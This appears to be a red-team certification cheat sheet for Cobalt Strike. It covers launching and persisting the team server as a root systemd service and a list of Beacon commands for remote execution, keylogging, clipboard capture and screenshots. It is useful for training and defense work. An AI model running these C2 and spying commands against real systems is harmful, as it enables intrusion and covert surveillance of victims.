CRTO Cheat Sheet
Cobalt Strike
Team Server
From terminal
sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX
As a Service
sudo nano /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
[Install]
WantedBy=multi-user.target
sudo systemctl daemon-reload
sudo systemctl status teamserver.service
sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service
sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service
Beacon
# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jib>
# Recon
net logons
clipboard
keylogger
printscreen
screenshot
screenwatch
# DNS Beacon
checkin # Get metadata/info Beacon
Listeners
Last updated